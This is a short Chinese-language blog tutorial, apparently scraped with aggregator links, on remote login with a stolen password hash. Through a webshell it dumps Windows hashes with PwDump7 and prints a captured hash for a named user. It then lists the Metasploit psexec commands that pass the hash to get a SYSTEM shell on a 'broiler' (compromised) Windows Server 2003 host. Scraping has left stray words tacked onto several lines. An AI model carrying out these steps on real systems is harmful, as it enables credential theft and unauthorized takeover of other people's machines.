利用hash遠程登錄系統
有的時候當咱們拿到系統管理員hash因爲密碼複雜度太高沒法破解時候能夠利用hash直接進行遠程登陸shell
咱們用到Metasploit裏面的模塊 肉雞爲windwos server 2003 x32系統windows
1.利用抓哈希工具PwDump7.exe獲取哈希工具
菜刀輸入打開命令執行 PwDump7.exe>>1.txtserver
獲取的哈希 blog
huwei:1010:759B9B71AEA7EE2779B6D67AACF4A147:165CD69A960EEF608596914B58F6DF82:::ip
這一段就是hash值165CD69A960EEF608596914B58F6DF82md5
放入放到md5解碼裏面沒解出來cmd
放到彩虹表裏面也沒跑出來hash
這個時候能夠利用msf 了it
打開kali 終端輸入命令
msfconsole
輸入模塊利用
use exploit/windows/smb/psexec
show options 查看當前須要填寫的信息
set rhost 肉雞ip
set smbuser huwei
set smbpass 759B9B71AEA7EE2779B6D67AACF4A147:165CD69A960EEF608596914B58F6DF82
set run
shell
會反彈一個system權限cmdshell
相關文章
- 1. 遠程登錄Linux系統
- 2. 遠程登錄linux系統
- 3. 利用MobaXterm遠程登錄ubuntu主機
- 4. WindowS 系統免密碼遠程登錄
- 5. 【Linux】:遠程登錄Linux系統
- 6. 遠程登錄
- 7. 遠程登陸Linux系統
- 8. openssh遠程系統登陸
- 9. 【Linux】讓Linux系統允許使用root賬號遠程登錄
- 10. 遠程登錄多用戶同時訪問Win7系統遠程桌面
- 更多相關文章...
- • 登錄MySQL數據庫 - MySQL教程
- • 操作系統(OS)平臺 統計 - 瀏覽器信息
- • Docker容器實戰(七) - 容器眼光下的文件系統
- • Git可視化極簡易教程 — Git GUI使用方法
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 遠程登錄Linux系統
- 2. 遠程登錄linux系統
- 3. 利用MobaXterm遠程登錄ubuntu主機
- 4. WindowS 系統免密碼遠程登錄
- 5. 【Linux】:遠程登錄Linux系統
- 6. 遠程登錄
- 7. 遠程登陸Linux系統
- 8. openssh遠程系統登陸
- 9. 【Linux】讓Linux系統允許使用root賬號遠程登錄
- 10. 遠程登錄多用戶同時訪問Win7系統遠程桌面